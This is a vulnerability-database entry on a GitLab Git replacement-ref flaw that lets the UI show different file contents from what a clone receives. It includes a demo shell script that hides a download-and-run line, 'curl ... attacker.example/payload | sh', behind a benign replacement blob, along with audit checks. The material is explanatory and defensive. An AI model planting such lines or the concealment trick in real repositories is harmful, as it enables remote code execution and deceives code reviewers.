
Cloud Vulnerability DB
A community-led vulnerabilities database
An issue was discovered in GitLab affecting versions prior to 14.4.5, between 14.5.0 and 14.5.3, and between 14.6.0 and 14.6.1. The vulnerability allows repository content spoofing using Git replacement references: GitLab invoked git sub-commands without instructing them to ignore replacement references (refs/replace/*), so a malicious user could make the contents of their commits appear different in the GitLab UI from what the repository actually contains (GitLab Security Release).
The vulnerability stems from GitLab's handling of git replacement references, a feature of the git CLI (git replace) that lets one object stand in for another when objects are read. When Gitaly ran git filter-branch and git cat-file to fetch the contents of blob objects, the content of the replacement object was returned instead of that of the original blob. The result is a discrepancy between what GitLab renders and the actual file contents obtained by checking out the repository. The vulnerability is rated medium severity with a CVSS score of 6.5 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N): reachable over the network with low attack complexity by any authenticated low-privilege user, with no user interaction, and with its impact confined to integrity (GitLab Security Release).
The practical effect is a mismatch between the file contents rendered on GitLab and the file contents in a clone of the repository. Malicious code can therefore sit in plain sight: a reviewer reading the repository on GitLab sees the benign replacement, while users who clone it, CI/CD jobs that check it out, and systems that download source code archives instead of performing a git checkout receive the real content and may execute it, potentially resulting in Remote Code Execution (RCE) (CERT-EU).
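The following script is an added example, not code from GitLab, Gitaly or the advisory. It reproduces the mechanism described in the two paragraphs above with plain git on a throwaway repository: a commit whose blob is the real payload, a replacement ref that points that blob at a benign one, a read with git cat-file that honours the replacement (the situation the advisory describes), the same read with --no-replace-objects, and a fresh clone that never sees the replacement. The repository path, the file name install.sh, the attacker.example host and the file contents are all constructed for the demo and are not taken from the advisory.

```shell
#!/bin/sh
# Added example, not code from GitLab, Gitaly or the advisory. It reproduces
# the mechanism with plain git: a replacement ref (refs/replace/<object-id>)
# makes every object-reading command, cat-file included, return the
# replacement object unless replacement is switched off. Repository paths,
# file names and contents are constructed for the demo.
set -eu

# Throwaway commit identity (constructed).
GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.invalid
GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.invalid
export GIT_AUTHOR_NAME GIT_AUTHOR_EMAIL GIT_COMMITTER_NAME GIT_COMMITTER_EMAIL

# setup_repo DIR
# Builds the attacker's repository: one commit whose install.sh is the real
# payload, plus a replacement ref that points the payload blob at a benign
# blob that is not reachable from any commit. Prints the payload blob's id.
setup_repo() {
  dir=$1
  rm -rf "$dir"
  git init -q "$dir"
  printf 'curl -s http://attacker.example/payload | sh\n' > "$dir/install.sh"
  git -C "$dir" add install.sh
  git -C "$dir" commit -q -m 'add installer'
  orig=$(git -C "$dir" rev-parse HEAD:install.sh)
  benign=$(printf 'echo "nothing to see here"\n' | git -C "$dir" hash-object -w --stdin)
  # Writes refs/replace/$orig -> $benign; both are blobs, as git requires.
  git -C "$dir" replace "$orig" "$benign"
  echo "$orig"
}

# server_view DIR OID
# What a server gets if it reads the blob with plain `git cat-file`, which
# honours refs/replace/* in the repository it runs in: the benign text.
server_view() {
  git -C "$1" cat-file -p "$2"
}

# unreplaced_view DIR OID
# The same read with replacement disabled; --no-replace-objects (or the
# environment variable GIT_NO_REPLACE_OBJECTS=1) returns the real blob.
unreplaced_view() {
  git -C "$1" --no-replace-objects cat-file -p "$2"
}

# clone_view SRC DEST
# What a user or CI job actually gets: clone and read install.sh from the
# working tree. The default fetch refspec covers refs/heads/* and tags, not
# refs/replace/*, so the clone holds the payload and nothing hides it.
clone_view() {
  rm -rf "$2"
  git clone -q --no-local "$1" "$2"
  cat "$2/install.sh"
}

# list_replace_refs DIR
# Audit check for a hosted repository: prints every replacement ref, one per
# line. A repository with nothing to hide normally prints nothing.
list_replace_refs() {
  git -C "$1" for-each-ref --format='%(refname)' refs/replace/
}

# Stand-alone run: show the three views side by side.
if [ "${1:-}" = "demo" ]; then
  work=$(mktemp -d)
  oid=$(setup_repo "$work/repo")
  echo "server (replacements honoured): $(server_view "$work/repo" "$oid")"
  echo "server (--no-replace-objects):  $(unreplaced_view "$work/repo" "$oid")"
  echo "fresh clone working tree:       $(clone_view "$work/repo" "$work/clone")"
  echo "replacement refs present:"
  list_replace_refs "$work/repo"
fi
```

Run the script with the single argument demo to print the three views. Two general checks follow from it, independent of how GitLab itself patched the issue: any server-side read of repository objects that feeds a UI, a diff, or an archive should run with --no-replace-objects or GIT_NO_REPLACE_OBJECTS=1 so that it reports the same bytes a clone receives, and a hosting service has no reason to accept pushes to refs/replace/* from ordinary users, so list_replace_refs against a hosted repository that unexpectedly prints refs is worth investigating.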
The vulnerability has been fixed in GitLab versions 14.6.2, 14.5.4, and 14.4.5 for both Community Edition (CE) and Enterprise Edition (EE), matching the affected ranges above. Users are strongly recommended to upgrade to these versions immediately. GitLab.com has already been updated with the patched version (GitLab Security Release).
Source: This report was generated using AI